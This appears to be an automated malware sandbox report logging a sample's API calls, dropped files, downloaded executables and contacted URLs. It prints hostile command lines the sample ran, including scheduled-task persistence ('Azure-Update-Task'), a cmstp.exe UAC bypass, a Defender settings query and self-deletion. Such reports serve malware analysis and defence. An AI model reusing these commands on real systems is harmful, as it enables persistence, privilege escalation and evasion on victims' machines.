allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0038a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1684
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72142000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006dd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006de000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006df000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05bd0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 851968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00530000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x720a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x720a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00780000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00392000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00790000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0039a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 3350459
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \\?\Volume{c2d901c4-0706-11e8-912e-806e6f6e6963}\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13719306240
free_bytes_available: 13719306240
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open1.png.lnk
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\AccessibleMarshal.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\vcruntime140.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\mozMapi32_InUse.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\msvcp140.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\breakpadinjector.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\Public\Xypgtv\Xypgtv.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-interlocked-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\lgpllibs.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-rtlsupport-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\ldap60.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\lGN88VeVbt.exe
file C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll
file C:\Windows\Temp\m5smgpbx.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\ucrtbase.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\mozMapi32.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\prldap60.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Roaming\pYVWAjXtpzU.exe
file C:\Users\Public\KDECO.bat
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-memory-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll
file C:\Users\Public\Trast.bat
file C:\Users\Public\UKO.bat
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-profile-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\sqlite3.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\PujMnRGyIh.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open1.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\sn.txt.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.pyw.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.pyw.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\exit.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\readme.txt.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.txt.lnk
file C:\Users\test22\AppData\LocalLow\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\age.pyw.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\office_2007.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open.PNG.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\util.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Python27.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.py.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Settings.ini.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.py.lnk
cmdline C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline "powershell" Get-MpPreference -verbose
cmdline /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
cmdline schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline schtasks.exe /Create /TN "Updates\pYVWAjXtpzU" /XML "C:\Users\test22\AppData\Local\Temp\tmpF3DA.tmp"
cmdline "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYVWAjXtpzU" /XML "C:\Users\test22\AppData\Local\Temp\tmpF3DA.tmp"
cmdline cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcvb.exe"
file C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
file C:\Users\test22\AppData\Local\Temp\zxcvb.exe
file C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe
file C:\Users\test22\AppData\Local\Temp\KqbKspamd9.exe
file C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe
file C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe
file C:\Users\test22\AppData\Local\Temp\PujMnRGyIh.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\breakpadinjector.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\prldap60.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\nss3.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-libraryloader-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\vcruntime140.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\MapiProxy.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\IA2Marshal.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-memory-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-sysinfo-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\msvcp140.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\qipcap.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\sqlite3.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\ucrtbase.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\libEGL.dll
file C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\nssckbi.dll
file C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\nssdbm3.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\lgpllibs.dll
file C:\Users\test22\AppData\Roaming\pYVWAjXtpzU.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\lGN88VeVbt.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\lGN88VeVbt.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\KqbKspamd9.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\KqbKspamd9.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\PujMnRGyIh.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\PujMnRGyIh.exe
1 1 0

CreateProcessInternalW

thread_identifier: 2920
thread_handle: 0x000007c0
process_identifier: 2712
current_directory:
filepath:
track: 1
command_line: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcvb.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000007d0
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: schtasks.exe
parameters: /Create /TN "Updates\pYVWAjXtpzU" /XML "C:\Users\test22\AppData\Local\Temp\tmpF3DA.tmp"
filepath: schtasks.exe
1 1 0

CreateProcessInternalW

thread_identifier: 1824
thread_handle: 0x00000218
process_identifier: 1772
current_directory: C:\Users\test22\AppData\LocalLow
filepath:
track: 1
command_line: "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\1vt3brkt.inf
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 1
process_handle: 0x0000021c
1 1 0

CreateProcessInternalW

thread_identifier: 2608
thread_handle: 0x000000ac
process_identifier: 2520
current_directory:
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000000b0
1 1 0

CreateProcessInternalW

thread_identifier: 2600
thread_handle: 0x000001e8
process_identifier: 2624
current_directory: C:\Users\test22\AppData\LocalLow
filepath:
track: 1
command_line: "powershell" Get-MpPreference -verbose
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 1
process_handle: 0x00000208
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 77824
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x020f1000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $¢l$æ JOæ JOæ JOïuÙOê JO?oKNä JO?oINä JO?oONì JO?oNNí JOÄmKNä JO-nKNå JOæ KO~ JO-nNNò JO-nJNç JO-nµOç JO-nHNç JORichæ JOPEL¿bë[à"!  ¶b—¼ÐP ±@¨¸È0xÐ@`ÐþT(ÿ@Ðl.textË´¶ `.rdata DÐFº@@.data @À.rsrcx0@@.reloc`@@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELê˜=Sv? à! ÐàXà` 8à  °˜ÐL ü'ð¬Ñp.textÀÎÐ`0`.data°àÖ@@À.rdata$­ð®æ@@@.bss˜ €@À.edata˜°”@0@.idataL Ð ®@0À.CRTàº@0À.tls ð¼@0À.relocü'(¾@0B/4`0æ@@B/19È@è@B/35MPì@B/51`C`Dô@B/63„ °8@B/77” À F@B/89ÐR
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Àð/„‘AV„‘AV„‘AVéÒVˆ‘AV]ó@W†‘AV1†V…‘AV]óBW€‘AV]óDW‘AV]óEW‘AV¦ñ@W€‘AVOò@W‡‘AV„‘@V֑AVOòBW†‘AVOòEWÀ‘AVOòAW…‘AVOò¾V…‘AVOòCW…‘AVRich„‘AVPELØbë[à"!  Øf)Ýðp£s@pæPÀæÈ@xüÐPà0âTˆâ@ð8.texttÖØ `.rdataüþðÜ@@.data,HðÜ@À.rsrcx@à@@.relocàPä@B
request_handle: 0x00cc000c
1 1 0
section .text (virtual_address 0x00002000, virtual_size 0x000ea160, size_of_data 0x000ea200, entropy 7.817839234642155) entropy 7.81783923464 description A section with a high entropy has been found
entropy 0.993633952255 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://ip-api.com/json
url https://dotbit.me/a/
description (no description) rule DebuggerCheck__GlobalFlags
